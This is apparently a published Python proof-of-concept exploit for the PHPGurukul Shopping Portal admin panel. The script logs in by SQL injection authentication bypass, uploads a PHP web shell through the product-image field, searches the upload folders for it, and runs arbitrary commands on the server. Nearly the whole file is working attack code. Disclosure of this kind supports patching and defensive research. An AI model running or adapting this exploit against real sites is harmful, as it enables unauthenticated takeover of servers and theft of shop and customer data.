79 lines
No EOL
2.6 KiB
Python
Executable file
79 lines
No EOL
2.6 KiB
Python
Executable file
# Exploit Title: Shopping Portal ProVersion 3.0 - Authentication Bypass
|
|
# Exploit Author: Metin Yunus Kandemir (kandemir)
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
|
|
# Version: v4.0
|
|
# Category: Webapps
|
|
# Tested on: Xampp for Windows
|
|
|
|
# Description:
|
|
# Password and username parameters have sql injection vulnerability on admin panel.
|
|
# username: joke' or '1'='1'# , password: joke' or '1'='1'#
|
|
# Also, there isn't any restriction for malicious file uploading in the "Insert Product" section.
|
|
# This two vulnerabilities occur unauthenticated remote command execution.
|
|
|
|
#!/usr/bin/python
|
|
|
|
import requests
|
|
import sys
|
|
import urllib
|
|
|
|
if (len(sys.argv) !=3) or sys.argv[1] == "-h":
|
|
print "[*] Usage: PoC.py rhost/rpath command"
|
|
print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
|
|
command = sys.argv[2]
|
|
|
|
|
|
|
|
url = "http://"+rhost+"/admin/index.php"
|
|
data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}
|
|
|
|
with requests.Session() as session:
|
|
#login
|
|
|
|
lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
|
|
print ("[*] Status code for login: %s"%lg.status_code)
|
|
if lg.status_code != 200:
|
|
print ("One bad day! Check web application path!")
|
|
sys.exit()
|
|
|
|
#upload file
|
|
|
|
files = {'productimage1': ('command.php', '<?php system($_GET["cmd"]); ?>'), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')}
|
|
fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah<br>", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""}
|
|
|
|
furl = "http://"+rhost+"/admin/insert-product.php"
|
|
fupload = session.post(url=furl, files=files, data=fdata)
|
|
print ("[*] Status code for file uploading: %s"%fupload.status_code)
|
|
|
|
if fupload.status_code != 200:
|
|
print ("One bad day! File didn't upload.")
|
|
sys.exit()
|
|
dir = 0
|
|
dirr = str(dir)
|
|
|
|
#find uploaded file
|
|
|
|
while True:
|
|
el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php")
|
|
|
|
if el.status_code == 200:
|
|
|
|
print "File Found!"
|
|
print "Put On A Happy Face!\r\n\r\n"
|
|
|
|
print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command))
|
|
break
|
|
else:
|
|
print "trying to find uploaded file..."
|
|
|
|
dir += 1
|
|
dirr = str(dir)
|
|
|
|
#exec
|
|
final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command)
|
|
print final.text |